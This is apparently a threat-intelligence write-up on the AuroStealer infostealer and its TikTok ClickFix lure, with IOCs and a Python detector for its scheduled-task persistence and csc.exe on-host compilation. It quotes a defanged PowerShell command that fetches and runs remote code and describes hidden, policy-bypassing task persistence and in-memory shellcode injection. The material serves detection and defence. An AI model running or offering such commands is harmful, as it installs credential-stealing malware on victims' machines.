
AuroStealer

AuroStealer is an information-stealing Trojan delivered in a TikTok-driven ClickFix-style social engineering campaign. Victims are lured by TikTok videos advertising “free” software activation (e.g., Photoshop) and are instructed to run an elevated PowerShell one-liner (e.g., iex (irm slmgr[.]win/photoshop)). The served PowerShell (SHA-256: 6d897b5661aa438a96ac8695c54b7c4f3a1fbf1b628c8d2011e50864860c6b23) downloads an executable payload from https://file-epq[.]pages[.]dev/updater.exe (SHA-256: 58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8), identified as AuroStealer, and establishes persistence via a scheduled task configured to run at user logon. The scheduled task name is chosen from a list mimicking legitimate update tasks (e.g., MicrosoftEdgeUpdateTaskMachineCore, GoogleUpdateTaskMachineCore, AdobeUpdateTask, OfficeBackgroundTaskHandlerRegistration, WindowsUpdateCheck) and runs powershell.exe with hidden window style and ExecutionPolicy Bypass.

The same chain also downloads and executes an additional payload source.exe (SHA-256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011) which performs on-host compilation by invoking C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe using a cmdline file at C:\Users\admin\AppData\Local\Temp\vpkwkdbo.cmdline. The dynamically compiled code includes a class that allocates RWX memory and executes injected shellcode in-memory via VirtualAlloc, CreateThread, and WaitForSingleObject.

The campaign is reported to reuse the lure across multiple fake “free software” themes and is associated in reporting with ongoing TikTok-based ClickFix activity distributing stealers (including AuroStealer; other families mentioned in the same context include Vidar and StealC). No specific threat actor attribution is provided in the content.

Notable IOCs mentioned: slmgr[.]win/photoshop, file-epq[.]pages[.]dev/updater.exe, PowerShell SHA-256 6d897b5661aa438a96ac8695c54b7c4f3a1fbf1b628c8d2011e50864860c6b23, updater.exe (AuroStealer) SHA-256 58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8, source.exe SHA-256 db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011, and the temp cmdline path C:\Users\admin\AppData\Local\Temp\vpkwkdbo.cmdline.
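The persistence and on-host compilation stages described above give defenders two concrete things to hunt for: a scheduled task whose name mimics a legitimate updater but whose action is a hidden, policy-bypassing PowerShell launch, and csc.exe being fed a .cmdline response file from a user's Temp directory. The detector below is an added example, not code from the page or from Mallory; the event records are constructed, and their field names (`type`, `task_name`, `action`, `command_line`) are an assumed normalised schema, not any specific product's format.

```python
import re

# Task names the page reports AuroStealer choosing to blend in with real updaters.
MIMICKED_TASK_NAMES = {
    "MicrosoftEdgeUpdateTaskMachineCore",
    "GoogleUpdateTaskMachineCore",
    "AdobeUpdateTask",
    "OfficeBackgroundTaskHandlerRegistration",
    "WindowsUpdateCheck",
}

HIDDEN_RE = re.compile(r"-(?:w|windowstyle)\s+hidden", re.IGNORECASE)
BYPASS_RE = re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.IGNORECASE)
# csc.exe compiling from a .cmdline response file under a user's Local\Temp.
CSC_TEMP_CMDLINE_RE = re.compile(
    r'\\csc\.exe\b.*\\AppData\\Local\\Temp\\[^\\\s"]+\.cmdline', re.IGNORECASE)


def classify(event: dict) -> list[str]:
    """Return the reasons one event matches the AuroStealer chain (empty if none)."""
    reasons = []
    if event.get("type") == "task_registered":
        name, action = event.get("task_name", ""), event.get("action", "")
        runs_powershell = "powershell" in action.lower()
        if name in MIMICKED_TASK_NAMES and runs_powershell:
            reasons.append("mimicked updater task name launching powershell.exe")
        if runs_powershell and HIDDEN_RE.search(action) and BYPASS_RE.search(action):
            reasons.append("task runs PowerShell hidden with ExecutionPolicy Bypass")
    elif event.get("type") == "process_create":
        if CSC_TEMP_CMDLINE_RE.search(event.get("command_line", "")):
            reasons.append("csc.exe on-host compilation from a Temp .cmdline file")
    return reasons


def hunt(events: list[dict]) -> dict:
    """Map event id -> reasons for every event that matched at least one rule."""
    return {e["id"]: r for e in events if (r := classify(e))}


# Constructed sample events (assumed schema): one malicious task, the genuine
# Google updater task with the same name, one AuroStealer-style csc.exe run
# using the cmdline path from the page, and a benign build-server csc.exe run.
SAMPLE_EVENTS = [
    {"id": 1, "type": "task_registered", "task_name": "GoogleUpdateTaskMachineCore",
     "action": r"powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\admin\AppData\Roaming\u.ps1"},
    {"id": 2, "type": "task_registered", "task_name": "GoogleUpdateTaskMachineCore",
     "action": r'"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /c'},
    {"id": 3, "type": "process_create",
     "command_line": r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\vpkwkdbo.cmdline"'},
    {"id": 4, "type": "process_create",
     "command_line": r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /noconfig @"C:\build\app.cmdline"'},
]

if __name__ == "__main__":
    for event_id, reasons in hunt(SAMPLE_EVENTS).items():
        print(event_id, reasons)
```

Only events 1 and 3 fire; the genuine updater task (same name, but its action is GoogleUpdate.exe) and the build-server csc.exe run do not, which is the distinction that keeps the task-name list usable without drowning in false positives.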
